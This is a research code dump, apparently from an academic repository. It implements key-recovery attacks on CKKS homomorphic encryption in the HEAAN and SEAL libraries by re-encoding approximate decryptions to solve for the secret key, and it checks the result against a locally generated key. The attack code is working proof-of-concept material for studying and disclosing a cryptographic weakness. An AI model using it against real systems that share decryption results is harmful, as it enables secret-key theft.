58 | // Generate plaintext input 59 | long slots = 1L << (logN-1); // use all slots 60 | complex *val_input = randomRealVector(slots, ptBound); 61 | 62 | // Key generation 63 | Context context(logN, logp, L, L+1); 64 | SecretKey secretKey(context); 65 | Scheme scheme(secretKey, context); 66 | if (hc == HC_VARIANCE) { 67 | // Add rotation keys when computing variance 68 | for (int i=1; i<=slots/2; i*=2) { 69 | scheme.addLeftRotKey(secretKey, i); // for left shift 1<* val_res = scheme.decode(ptxt_res); 95 | 96 | // Check homomorphic computation error 97 | std::vector> ptIn(val_input, val_input+slots), heRes(val_res, val_res+slots); 98 | std::vector> ptRes(slots); 99 | switch (hc) { 100 | case HC_VARIANCE : 101 | evalPlainVariance(ptRes, ptIn); 102 | break; 103 | case HC_SIGMOID : 104 | evalPlainFunc(ptRes, ptIn, SpecialFunction::SIGMOID); 105 | break; 106 | case HC_EXP : 107 | evalPlainFunc(ptRes, ptIn, SpecialFunction::EXP); 108 | break; 109 | default : 110 | ptRes.assign(val_input, val_input+slots); 111 | } 112 | std::cout << "exact value = " << ptRes[0] << ", computation error = " << abs(ptRes[0] - heRes[0]) 113 | << ", relative error = " << relError(ptRes, heRes) << std::endl; 114 | 115 | 116 | // ************************************************** 117 | // Key recovery attack 118 | // ************************************************** 119 | 120 | // Recover the encryption error by encoding the approximate plaintext 121 | Plaintext ptxt_enc = scheme.encode(val_res, slots, ctxt_res.l); 122 | 123 | // Check for encoding error 124 | uint64_t* ptxt_res_coeff = new uint64_t[context.N](); 125 | uint64_t* ptxt_enc_coeff = new uint64_t[context.N](); 126 | copy(ptxt_res.mx, ptxt_res.mx + context.N, ptxt_res_coeff); 127 | copy(ptxt_enc.mx, ptxt_enc.mx + context.N, ptxt_enc_coeff); 128 | context.qiINTTAndEqual(ptxt_res_coeff, 0); // to coeff representation 129 | context.qiINTTAndEqual(ptxt_enc_coeff, 0); // to coeff representation, only 1st tower 130 | uint64_t encoding_error = maxDiff(ptxt_res_coeff, ptxt_enc_coeff, context.N, context.qVec[0]); 131 | std::cout << "encoding error = " << encoding_error << std::endl; 132 | 133 | // rhs = m' - b 134 | uint64_t* rRhs = new uint64_t[ctxt_res.l << context.logN](); 135 | context.sub(rRhs, ptxt_enc.mx, ctxt_res.bx, ctxt_res.l); // What about using ptxt_res.mx ? 136 | 137 | // a^{-1} 138 | uint64_t* raInv = new uint64_t[ctxt_res.l << context.logN](); 139 | #pragma omp parallel for 140 | for (int i = 0; i < ctxt_res.l; i++) { 141 | uint64_t qi = context.qVec[i]; 142 | for (int j = 0; j < context.N; j++) { 143 | raInv[j + i*context.N] = invMod(ctxt_res.ax[j + i*context.N], qi); 144 | } 145 | } 146 | 147 | // guess sk 148 | uint64_t* rss = new uint64_t[ctxt_res.l << context.logN](); 149 | context.mul(rss, raInv, rRhs, ctxt_res.l, 0); 150 | 151 | // for debugging, convert to coeff representation 152 | uint64_t* ss_coeff = new uint64_t[ctxt_res.l << context.logN](); 153 | uint64_t* sk_coeff = new uint64_t[ctxt_res.l << context.logN](); 154 | copy(rss, rss + context.N * ctxt_res.l, ss_coeff); 155 | copy(secretKey.sx, secretKey.sx + context.N * ctxt_res.l, sk_coeff); 156 | context.INTTAndEqual(ss_coeff, ctxt_res.l, 0); 157 | context.INTTAndEqual(sk_coeff, ctxt_res.l, 0); 158 | 159 | return !memcmp(rss, secretKey.sx, sizeof(uint64_t) * ctxt_res.l * context.N); 160 | } 161 | 162 | int main(int argc, char* argv[]) { 163 | // Parameters // 164 | HomomorphicComputation hc = argc>1 ? parseHC(argv[1]) : HC_NOOP; // Default noop 165 | long logN = argc>2 ? atoi(argv[2]) : 15; // Ring dimension 166 | long L = argc>3 ? atoi(argv[3]) : 10; // Total level of computation 167 | long logp = argc>4 ? atoi(argv[4]) : 20; // 20 bit precision 168 | double plainBound = argc>5 ? atof(argv[5]) : 1.0; // plaintext size 169 | long evalDeg = argc>6 ? atof(argv[6]) : 5; // max degree to evaluate 170 | 171 | std::cout << "Running attack on " << hcString(hc) << std::endl 172 | << " N = " << (1 << logN) << ", L = " << L << ", logp = " << logp << ", |plaintext| = " << plainBound << std::endl; 173 | 174 | srand(time(NULL)); 175 | if (attack(hc, logN, L, logp, plainBound, evalDeg)) { 176 | cout << "Found key!" << endl; 177 | } 178 | else cout << "Attack failed!" << endl; 179 | 180 | return 0; 181 | } 182 | -------------------------------------------------------------------------------- /src/seal_attack.cpp: -------------------------------------------------------------------------------- 1 | // Key recovery attack against the SEAL implementation of CKKS 2 | #include "seal/seal.h" 3 | #include "seal/util/polyarithsmallmod.h" 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #include "seal_utils.h" 10 | #include "eval.h" 11 | 12 | using namespace seal; 13 | 14 | 15 | void evalVariance(Ciphertext & ctRes, Ciphertext const& ct, CKKSEncoder & encoder, 16 | Evaluator & evaluator, RelinKeys const& relin_keys, GaloisKeys const& gal_keys, 17 | uint32_t logBatchSize, double scale) { 18 | std::cout << "evalVariance size = " << (1< ctPow2s(logDeg+1); 57 | evalPowerOf2(ctPow2s, ct, logDeg, evaluator, relin_keys); 58 | ctRes = ct; 59 | 60 | std::vector plain_coeff(deg+1); 61 | encoder.encode(coeff[1], ct.parms_id(), scale, plain_coeff[1]); 62 | evaluator.multiply_plain_inplace(ctRes, plain_coeff[1]); // c_1 * x 63 | evaluator.rescale_to_next_inplace(ctRes); 64 | 65 | encoder.encode(coeff[0], ctRes.parms_id(), ctRes.scale(), plain_coeff[0]); // scale as ctRes 66 | evaluator.add_plain_inplace(ctRes, plain_coeff[0]); // c_1 * x + c_0 67 | for (int i = 2; i <= deg; i++) { 68 | if (fabs(coeff[i]) < 1e-27) { 69 | continue; // Too small, skip this term 70 | } 71 | int k = std::floor(std::log2((double)i)); 72 | int r = i - (1 << k); // i = 2^k + r 73 | Ciphertext tmp = ctPow2s[k]; // x^(2^k) 74 | while (r > 0) { 75 | k = std::floor(std::log2((double)r)); 76 | r = r - (1 << k); 77 | 78 | Ciphertext ctPow2k = ctPow2s[k]; 79 | evaluator.mod_switch_to_inplace(ctPow2k, tmp.parms_id()); // ctPow2s[k] is in a higher level 80 | evaluator.multiply_inplace(tmp, ctPow2k); 81 | evaluator.relinearize_inplace(tmp, relin_keys); 82 | evaluator.rescale_to_next_inplace(tmp); 83 | } 84 | 85 | encoder.encode(coeff[i], tmp.parms_id(), tmp.scale(), plain_coeff[i]); // scale as ctRes 86 | evaluator.multiply_plain_inplace(tmp, plain_coeff[i]); // c_i * x^i 87 | evaluator.rescale_to_next_inplace(tmp); 88 | 89 | auto res_context_data = context->get_context_data(ctRes.parms_id()); 90 | auto tmp_context_data = context->get_context_data(tmp.parms_id()); 91 | if (res_context_data->chain_index() < tmp_context_data->chain_index()) { 92 | evaluator.mod_switch_to_inplace(tmp, ctRes.parms_id()); 93 | } else { 94 | evaluator.mod_switch_to_inplace(ctRes, tmp.parms_id()); 95 | } 96 | double new_scale = pow(2.0, round(log2(tmp.scale()))); 97 | tmp.scale() = new_scale; // round the scaling factor to the nearest power of 2 98 | ctRes.scale() = new_scale; // round the scaling factor to the nextest power of 2 99 | evaluator.add_inplace(ctRes, tmp); // Now they can be added together 100 | } 101 | } 102 | 103 | 104 | 105 | int attack(uint32_t logN = 15, // Ring size 106 | uint32_t scaleBits = 40, // bit-length of the scaling factor 107 | double plainBound = 1.0, // bound on the plaintext numbers 108 | int32_t evalDeg = -1, // degree to evaluate, default to all 109 | HomomorphicComputation hc = HC_NOOP // the circuit to compute homomorphically 110 | ) { 111 | EncryptionParameters parms(scheme_type::CKKS); // Set the parameters for CKKS 112 | size_t poly_modulus_degree = 1<<logN; 113 | parms.set_poly_modulus_degree(poly_modulus_degree); 114 | 115 | int maxQBits = logN == 16 ? 350 : CoeffModulus::MaxBitCount(poly_modulus_degree, sec_level_type::tc256); 116 | std::vector<int> modulusBits = { 60 }; // Set the first prime to be 60-bit 117 | int totalQBits = 60; 118 | while (totalQBits <= maxQBits-60) { // reserve the last special prime (60-bit) 119 | modulusBits.push_back(scaleBits); // add a prime modulus of size == scaleBits 120 | totalQBits += scaleBits; 121 | } 122 | modulusBits.push_back(60); // add the special prime modulus 123 | parms.set_coeff_modulus(CoeffModulus::Create( 124 | poly_modulus_degree, modulusBits)); 125 | auto context = SEALContext::Create(parms, true, sec_level_type::none); 126 | print_parameters(context); 127 | 128 | // Generate keys 129 | KeyGenerator keygen(context); 130 | PublicKey public_key = keygen.public_key(); 131 | SecretKey secret_key = keygen.secret_key(); 132 | RelinKeys relin_keys = keygen.relin_keys_local(); 133 | GaloisKeys gal_keys; 134 | 135 | if (hc == HC_VARIANCE) { 136 | // Generate rotation keys for variance computation 137 | std::vector<int> rotIndexSet(logN-1); 138 | for (int32_t i = 0; i < logN-1; i++) { 139 | rotIndexSet[i] = -(1 << i); 140 | } 141 | gal_keys = keygen.galois_keys_local(rotIndexSet); 142 | } 143 | 144 | Encryptor encryptor(context, public_key); 145 | Evaluator evaluator(context); 146 | Decryptor decryptor(context, secret_key); 147 | CKKSEncoder encoder(context); 148 | size_t slot_count = encoder.slot_count(); // Let's use all the available slots 149 | 150 | // First we generate some random numbers 151 | std::vector<cx_double> val_input(slot_count); 152 | randomComplexVector(val_input, slot_count, plainBound); 153 | 154 | // Set the initial scale 155 | double scale = pow(2.0, scaleBits); 156 | 157 | // Encode plaintext numbers into a polynomial 158 | Plaintext ptxt_input; 159 | encoder.encode(val_input, scale, ptxt_input); 160 | Ciphertext ctxt_input; 161 | encryptor.encrypt(ptxt_input, ctxt_input); 162 | 163 | // Homomorphic computation 164 | Ciphertext ctxt_res; 165 | std::vector<double> coeff(11); 166 | switch (hc) { 167 | case HC_VARIANCE : 168 | evalVariance(ctxt_res, ctxt_input, encoder, evaluator, relin_keys, gal_keys, log2(slot_count), scale); 169 | break; 170 | case HC_SIGMOID : 171 | coeff = SpecialFunction::coeffsOf[SpecialFunction::FuncName::SIGMOID]; 172 | evalFunction(ctxt_res, ctxt_input, coeff, context, encoder, evaluator, relin_keys, scale, evalDeg); 173 | break; 174 | case HC_EXP : 175 | coeff = SpecialFunction::coeffsOf[SpecialFunction::FuncName::EXP]; 176 | evalFunction(ctxt_res, ctxt_input, coeff, context, encoder, evaluator, relin_keys, scale, evalDeg); 177 | break; 178 | default : 179 | ctxt_res = ctxt_input; // noop, just copy the input ciphertext 180 | } 181 | // Now let's do approximate decryption and then recover the key 182 | Plaintext ptxt_res; 183 | decryptor.decrypt(ctxt_res, ptxt_res); // approx decryption 184 | 185 | // Decode the plaintext polynomial 186 | std::vector<std::complex<double>> val_res; 187 | encoder.decode(ptxt_res, val_res); // decode to an array of complex 188 | 189 | // Check computation errors 190 | std::vector<std::complex<double>> pt_res(slot_count); 191 | switch (hc) { 192 | case HC_VARIANCE : 193 | evalPlainVariance(pt_res, val_input); 194 | break; 195 | case HC_SIGMOID : 196 | evalPlainFunc(pt_res, val_input, SpecialFunction::SIGMOID, evalDeg); 197 | break; 198 | case HC_EXP : 199 | evalPlainFunc(pt_res, val_input, SpecialFunction::EXP, evalDeg); 200 | break; 201 | default : 202 | pt_res = val_input; // noop, just copy the plaintext input 203 | } 204 | std::cout << "computation error = " << maxDiff(pt_res, val_res) 205 | << ", relative error = " << relError(pt_res, val_res) << std::endl; 206 | 207 | // ************************************************** 208 | // Key recovery attack 209 | // ************************************************** 210 | 211 | // First we encode the decrypted floating point numbers into polynomials 212 | Plaintext ptxt_enc; 213 | encoder.encode(val_res, ctxt_res.parms_id(), ctxt_res.scale(), ptxt_enc); 214 | 215 | // Then we get some impl parameters used in the scheme 216 | auto context_data = context->get_context_data(ctxt_res.parms_id()); 217 | auto small_ntt_tables = context_data->small_ntt_tables(); 218 | auto &ciphertext_parms = context_data->parms(); 219 | auto &coeff_modulus = ciphertext_parms.coeff_modulus(); 220 | size_t coeff_mod_count = coeff_modulus.size(); 221 | size_t coeff_count = ciphertext_parms.poly_modulus_degree(); 222 | 223 | // Check encoding error 224 | Plaintext ptxt_diff; 225 | ptxt_diff.parms_id() = parms_id_zero; 226 | ptxt_diff.resize(util::mul_safe(coeff_count, coeff_modulus.size())); 227 | sub_dcrtpoly(ptxt_enc.data(), ptxt_res.data(), coeff_count, coeff_modulus, ptxt_diff.data()); 228 | 229 | to_coeff_rep(ptxt_diff.data(), coeff_count, coeff_mod_count, small_ntt_tables); 230 | long double err_norm = infty_norm(ptxt_diff.data(), context_data.get()); 231 | std::cout << "encoding error = " << err_norm << std::endl; 232 | 233 | // Now let's compute the secret key 234 | MemoryPoolHandle pool = MemoryManager::GetPool(); 235 | std::cout << "key recovery ..." << std::endl; 236 | 237 | // rhs = ptxt_enc - ciphertext.b 238 | auto rhs(util::allocate_zero_poly(poly_modulus_degree, coeff_mod_count, pool)); 239 | sub_dcrtpoly(ptxt_enc.data(), ctxt_res.data(0), coeff_count, coeff_modulus, rhs.get()); 240 | 241 | auto ca(util::allocate_zero_poly(poly_modulus_degree, coeff_mod_count, pool)); 242 | assign_dcrtpoly(ctxt_res.data(1), coeff_count, coeff_modulus.size(), ca.get()); 243 | 244 | std::cout << "compute ca^{-1} ..." << std::endl; 245 | auto ca_inv(util::allocate_zero_poly(poly_modulus_degree, coeff_mod_count, pool)); 246 | 247 | bool has_inv = inv_dcrtpoly(ca.get(), coeff_count, coeff_modulus, ca_inv.get()); 248 | if(!has_inv) { 249 | throw std::logic_error("ciphertext[1] has no inverse"); 250 | } 251 | 252 | // The recovered secret: key_guess = ciphertext.a^{-1} * rhs 253 | std::cout << "compute (m' - cb) * ca^{-1} ..." << std::endl; 254 | auto key_guess(util::allocate_zero_poly(poly_modulus_degree, coeff_mod_count, pool)); 255 | mul_dcrtpoly(rhs.get(), ca_inv.get(), coeff_count, coeff_modulus, key_guess.get()); 256 | 257 | bool is_found = util::is_equal_uint(key_guess.get(), 258 | secret_key.data().data(), 259 | coeff_count * coeff_mod_count); 260 | 261 | // In retrospect, let's see how big the re-encoded polynomial is 262 | to_coeff_rep(ptxt_enc.data(), coeff_count, coeff_mod_count, small_ntt_tables); 263 | std::cout << "m' norm bits = " << log2(l2_norm(ptxt_enc.data(), context_data.get())) << std::endl; 264 | 265 | return is_found; // All done 266 | } 267 | 268 | int main(int argc, char * argv[]) { 269 | int iter = 1; 270 | if (argc == 2) { 271 | iter = atoi(argv[1]); 272 | } 273 | HomomorphicComputation hc = argc>2 ? parseHC(argv[2]) : HC_NOOP; 274 | uint32_t logN = argc > 3 ? atoi(argv[3]) : 15; // ring size 275 | uint32_t scaleBits = argc > 4 ? atoi(argv[4]) : 40; // bit-length of scale 276 | double plainBound = argc > 5 ? atof(argv[5]) : 1.0; // upper bound on plaintext numbers 277 | int32_t evalDeg = argc > 6 ? atoi(argv[6]) : -1; // degree to evaluate, default to all 278 | 279 | int success = 0; 280 | for (int i = 0; i<iter; i++) { 281 | if (attack(logN, scaleBits, plainBound, evalDeg, hc)) { 282 | std::cout << "Found key!" << std::endl; 283 | success++; 284 | } 285 | else std::cout << "Attack failed!" << std::endl; 286 | } 287 | std::cout << "Attack worked " << success << " times out of " << iter << std::endl; 288 | return 0; 289 | } 290 | 291 | -------------------------------------------------------------------------------- /src/seal_utils.cpp: -------------------------------------------------------------------------------- 1 | #include "seal_utils.h" 2 | #include <seal/util/uintarithsmallmod.h> 3 | #include <seal/util/polyarithsmallmod.h> 4 | 5 | #include <iostream> 6 | 7 | void print_parameters(std::shared_ptr<seal::SEALContext> context) { 8 | auto &context_data = *context->key_context_data(); 9 | std::cout << "Encryption parameters :" << std::endl; 10 | std::cout << " poly_modulus_degree: " << 11 | context_data.parms().poly_modulus_degree() << std::endl; 12 | // Print the size of the true (product) coefficient modulus. 13 | std::cout << " coeff_modulus size: "; 14 | 15 | std::cout << context_data.total_coeff_modulus_bit_count() << " ("; 16 | auto coeff_modulus = context_data.parms().coeff_modulus(); 17 | std::size_t coeff_mod_count = coeff_modulus.size(); 18 | for (std::size_t i = 0; i < coeff_mod_count - 1; i++) 19 | { 20 | std::cout << coeff_modulus[i].bit_count() << " + "; 21 | } 22 | 23 | std::cout << coeff_modulus.back().bit_count(); 24 | std::cout << ") bits" << std::endl; 25 | } 26 | 27 | bool inv_dcrtpoly(util::ConstCoeffIter operand, std::size_t coeff_count, std::vector<Modulus> const& coeff_modulus, 28 | util::CoeffIter result) { 29 | bool * has_inv = new bool[coeff_modulus.size()]; 30 | std::fill_n(has_inv, coeff_modulus.size(), true); 31 | #pragma omp parallel for 32 | for (size_t j = 0; j < coeff_modulus.size(); j++) { 33 | for (size_t i = 0; i < coeff_count && has_inv[j]; i++) { 34 | uint64_t inv = 0; 35 | if (util::try_invert_uint_mod(operand[i + (j * coeff_count)], coeff_modulus[j], inv)) { 36 | result[i + (j * coeff_count)] = inv; 37 | } else { 38 | has_inv[j] = false; 39 | } 40 | } 41 | } 42 | for (size_t j = 0; j < coeff_modulus.size(); j++) { 43 | if (!has_inv[j]) return false; 44 | } 45 | delete [] has_inv; 46 | return true; 47 | } 48 | 49 | void mul_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b, std::size_t coeff_count, 50 | std::vector<Modulus> const& coeff_modulus, util::CoeffIter result) { 51 | #pragma omp parallel for 52 | for (size_t j = 0; j < coeff_modulus.size(); j++) { 53 | util::dyadic_product_coeffmod(a + (j * coeff_count), 54 | b + (j * coeff_count), 55 | coeff_count, 56 | coeff_modulus[j], 57 | result + (j * coeff_count)); 58 | } 59 | } 60 | 61 | void add_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b, std::size_t coeff_count, 62 | std::vector<Modulus> const& coeff_modulus, util::CoeffIter result) { 63 | #pragma omp parallel for 64 | for (size_t j = 0; j < coeff_modulus.size(); j++) { 65 | util::add_poly_coeffmod(a + (j * coeff_count), 66 | b + (j * coeff_count), 67 | coeff_count, 68 | coeff_modulus[j], 69 | result + (j * coeff_count)); 70 | } 71 | } 72 | 73 | void sub_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b, std::size_t coeff_count, 74 | std::vector<Modulus> const& coeff_modulus, util::CoeffIter result) { 75 | #pragma omp parallel for 76 | for (size_t j = 0; j < coeff_modulus.size(); j++) { 77 | util::sub_poly_coeffmod(a + (j * coeff_count), 78 | b + (j * coeff_count), 79 | coeff_count, 80 | coeff_modulus[j], 81 | result + (j * coeff_count)); 82 | } 83 | } 84 | 85 | void assign_dcrtpoly(util::ConstCoeffIter a, std::size_t coeff_count, std::size_t coeff_modulus_count, 86 | util::CoeffIter result) { 87 | #pragma omp parallel for 88 | for (size_t i = 0; i < coeff_modulus_count; i++) { 89 | util::set_poly(a + (i * coeff_count), coeff_count, 1, result + (i * coeff_count)); 90 | } 91 | } 92 | 93 | void to_eval_rep(util::CoeffIter a, size_t coeff_count, size_t coeff_modulus_count, util::NTTTables const* small_ntt_tables) { 94 | #pragma omp parallel for 95 | for (size_t j = 0; j < coeff_modulus_count; j++) { 96 | util::ntt_negacyclic_harvey(a + (j * coeff_count), small_ntt_tables[j]); // ntt form 97 | } 98 | } 99 | 100 | void to_coeff_rep(util::CoeffIter a, size_t coeff_count, size_t coeff_modulus_count, util::NTTTables const* small_ntt_tables) { 101 | #pragma omp parallel for 102 | for (size_t j = 0; j < coeff_modulus_count; j++) { 103 | util::inverse_ntt_negacyclic_harvey(a + (j * coeff_count), small_ntt_tables[j]); // non-ntt form 104 | } 105 | } 106 | 107 | long double infty_norm(util::ConstCoeffIter a, SEALContext::ContextData const* context_data) { 108 | auto &ciphertext_parms = context_data->parms(); 109 | auto &coeff_modulus = ciphertext_parms.coeff_modulus(); 110 | size_t coeff_mod_count = coeff_modulus.size(); 111 | size_t coeff_count = ciphertext_parms.poly_modulus_degree(); 112 | auto decryption_modulus = context_data->total_coeff_modulus(); 113 | auto upper_half_threshold = context_data->upper_half_threshold(); 114 | 115 | long double max = 0; 116 | 117 | auto aCopy(util::allocate_zero_poly(coeff_count, coeff_mod_count, MemoryManager::GetPool())); 118 | assign_dcrtpoly(a, coeff_count, coeff_mod_count, aCopy.get()); 119 | 120 | // CRT-compose the polynomial 121 | context_data->rns_tool()->base_q()->compose_array(aCopy.get(), coeff_count, MemoryManager::GetPool()); 122 | 123 | long double two_pow_64 = powl(2.0, 64); 124 | 125 | for (std::size_t i = 0; i < coeff_count; i++) { 126 | long double coeff = 0.0, cur_pow = 1.0; 127 | if (util::is_greater_than_or_equal_uint(aCopy.get() + (i * coeff_mod_count), 128 | upper_half_threshold, coeff_mod_count)) { 129 | for (std::size_t j = 0; j < coeff_mod_count; j++, cur_pow *= two_pow_64) { 130 | if (aCopy[i * coeff_mod_count + j] > decryption_modulus[j]) { 131 | auto diff = aCopy[i * coeff_mod_count + j] - decryption_modulus[j]; 132 | coeff += diff ? static_cast<long double>(diff) * cur_pow : 0.0; 133 | } else { 134 | auto diff = decryption_modulus[j] - aCopy[i * coeff_mod_count + j]; 135 | coeff -= diff ? static_cast<long double>(diff) * cur_pow : 0.0; 136 | } 137 | } 138 | } else { 139 | for (std::size_t j = 0; j < coeff_mod_count; j++, cur_pow *= two_pow_64) { 140 | auto curr_coeff = aCopy[i * coeff_mod_count + j]; 141 | coeff += curr_coeff ? static_cast<long double>(curr_coeff) * cur_pow : 0.0; 142 | } 143 | } 144 | 145 | if (fabsl(coeff) > max) { 146 | max = fabsl(coeff); 147 | } 148 | } 149 | 150 | return max; 151 | } 152 | 153 | long double l2_norm(util::ConstCoeffIter a, SEALContext::ContextData const* context_data) { 154 | auto &ciphertext_parms = context_data->parms(); 155 | auto &coeff_modulus = ciphertext_parms.coeff_modulus(); 156 | size_t coeff_mod_count = coeff_modulus.size(); 157 | size_t coeff_count = ciphertext_parms.poly_modulus_degree(); 158 | auto decryption_modulus = context_data->total_coeff_modulus(); 159 | auto upper_half_threshold = context_data->upper_half_threshold(); 160 | 161 | long double sum = 0; 162 | 163 | auto aCopy(util::allocate_zero_poly(coeff_count, coeff_mod_count, MemoryManager::GetPool())); 164 | assign_dcrtpoly(a, coeff_count, coeff_mod_count, aCopy.get()); 165 | 166 | // CRT-compose the polynomial 167 | context_data->rns_tool()->base_q()->compose_array(aCopy.get(), coeff_count, MemoryManager::GetPool()); 168 | 169 | long double two_pow_64 = powl(2.0, 64); 170 | 171 | for (std::size_t i = 0; i < coeff_count; i++) { 172 | long double coeff = 0.0, cur_pow = 1.0; 173 | if (util::is_greater_than_or_equal_uint(aCopy.get() + (i * coeff_mod_count), 174 | upper_half_threshold, coeff_mod_count)) { 175 | for (std::size_t j = 0; j < coeff_mod_count; j++, cur_pow *= two_pow_64) { 176 | if (aCopy[i * coeff_mod_count + j] > decryption_modulus[j]) { 177 | auto diff = aCopy[i * coeff_mod_count + j] - decryption_modulus[j]; 178 | coeff += diff ? static_cast<long double>(diff) * cur_pow : 0.0; 179 | } else { 180 | auto diff = decryption_modulus[j] - aCopy[i * coeff_mod_count + j]; 181 | coeff -= diff ? static_cast<long double>(diff) * cur_pow : 0.0; 182 | } 183 | } 184 | } else { 185 | for (std::size_t j = 0; j < coeff_mod_count; j++, cur_pow *= two_pow_64) { 186 | auto curr_coeff = aCopy[i * coeff_mod_count + j]; 187 | coeff += curr_coeff ? static_cast<long double>(curr_coeff) * cur_pow : 0.0; 188 | } 189 | } 190 | 191 | sum += coeff * coeff; 192 | } 193 | 194 | return sqrtl(sum); 195 | } 196 | 197 | std::string poly_to_string(std::uint64_t const* value, EncryptionParameters const& parms) { 198 | auto coeff_modulus = parms.coeff_modulus(); 199 | size_t coeff_mod_count = coeff_modulus.size(); 200 | size_t coeff_count = parms.poly_modulus_degree(); 201 | std::ostringstream result; 202 | for (size_t i = 0; i < coeff_mod_count; i++) { 203 | auto mod = coeff_modulus[i].value(); 204 | if (i>0) { 205 | result << std::endl; 206 | } 207 | result << "[" << mod << "]: "; 208 | for (size_t j = 0; j < coeff_count; j++) { 209 | std::uint64_t v = *value; 210 | if (v >= mod/2) { 211 | result << "-" << mod-v; 212 | } else { 213 | result << v; 214 | } 215 | result << (j==coeff_count?"":", "); 216 | value++; 217 | } 218 | } 219 | return result.str(); 220 | } 221 | 222 | 223 | void print_poly(std::uint64_t const* value, EncryptionParameters const& parms, size_t max_count) { 224 | auto coeff_modulus = parms.coeff_modulus(); 225 | size_t coeff_mod_count = coeff_modulus.size(); 226 | size_t coeff_count = parms.poly_modulus_degree(); 227 | for (size_t i = 0; i < coeff_mod_count; i++) { 228 | auto mod = coeff_modulus[i].value(); 229 | std::uint64_t const* v = value + i*coeff_count; 230 | if (i>0) { 231 | std::cout << std::endl; 232 | } 233 | std::cout << "[" << mod << "]: "; 234 | for (size_t j = 0; j < coeff_count && (max_count == 0 || j < max_count); j++) { 235 | if (*v >= mod/2) { 236 | std::cout << "-" << mod-(*v); 237 | } else { 238 | std::cout << *v; 239 | } 240 | std::cout << (j==coeff_count?"":", "); 241 | v++; 242 | } 243 | } 244 | std::cout.flush(); 245 | } 246 | -------------------------------------------------------------------------------- /src/seal_utils.h: -------------------------------------------------------------------------------- 1 | #ifndef SEAL_UTILS_H 2 | #define SEAL_UTILS_H 3 | // Some helper functions to use with SEAL 4 | 5 | #include <vector> 6 | #include <iostream> 7 | #include <seal/seal.h> 8 | #include <seal/modulus.h> 9 | #include <seal/util/iterator.h> 10 | 11 | using namespace seal; 12 | 13 | void print_parameters(std::shared_ptr<seal::SEALContext> context); 14 | 15 | // compute a^{-1}, where a is a double-CRT polynomial whose evaluation representation 16 | // is in aEvalRep. The double-CRT representation in SEAL is stored as a flat array of 17 | // length coeff_count * modulus_count: 18 | // [ 0 .. coeff_count-1 , coeff_count .. 2*coeff_count-1, ... ] 19 | // ^--- a (mod p0) , ^--- a (mod p1), , ... 20 | // return if the inverse exists, and result is also in evaluation representation 21 | bool inv_dcrtpoly(util::ConstCoeffIter aEvalRep, std::size_t coeff_count, std::vector<Modulus> const& coeff_modulus, 22 | util::CoeffIter result); 23 | 24 | // compute a*b, where both a and b are in evaluation representation 25 | void mul_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b, 26 | std::size_t coeff_count, std::vector<Modulus> const& coeff_modulus, 27 | util::CoeffIter result); 28 | 29 | // compute a+b, where both a and b are in the same representation 30 | void add_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b, 31 | std::size_t coeff_count, std::vector<Modulus> const& coeff_modulus, 32 | util::CoeffIter result); 33 | 34 | // compute a-b, where both a and b are in the same representation 35 | void sub_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b, 36 | std::size_t coeff_count, std::vector<Modulus> const& coeff_modulus, 37 | util::CoeffIter result); 38 | 39 | // assign result = a 40 | void assign_dcrtpoly(util::ConstCoeffIter a, std::size_t coeff_count, std::size_t coeff_modulus_count, 41 | util::CoeffIter result); 42 | 43 | void to_eval_rep(util::CoeffIter a, size_t coeff_count, size_t coeff_modulus_count, util::NTTTables const* small_ntt_tables); 44 | 45 | void to_coeff_rep(util::CoeffIter a, size_t coeff_count, size_t coeff_modulus_count, util::NTTTables const* small_ntt_tables); 46 | 47 | long double infty_norm(util::ConstCoeffIter a, SEALContext::ContextData const* context_data); 48 | 49 | long double l2_norm(util::ConstCoeffIter a, SEALContext::ContextData const* context_data); 50 | 51 | std::string poly_to_string(std::uint64_t const* value, EncryptionParameters const& parms); 52 | 53 | void print_poly(std::uint64_t const* value, EncryptionParameters const& parms, size_t max_count=0); 54 | 55 | template<typename T> 56 | std::ostream &operator <<(std::ostream &os, const std::vector<T> &v) { 57 | using namespace std; 58 | os << "["; 59 | copy(v.begin(), v.end(), ostream_iterator<T>(os, ", ")); 60 | os << "]"; 61 | return os; 62 | } 63 | 64 | #endif // SEAL_UTILS_H 65 | --------------------------------------------------------------------------------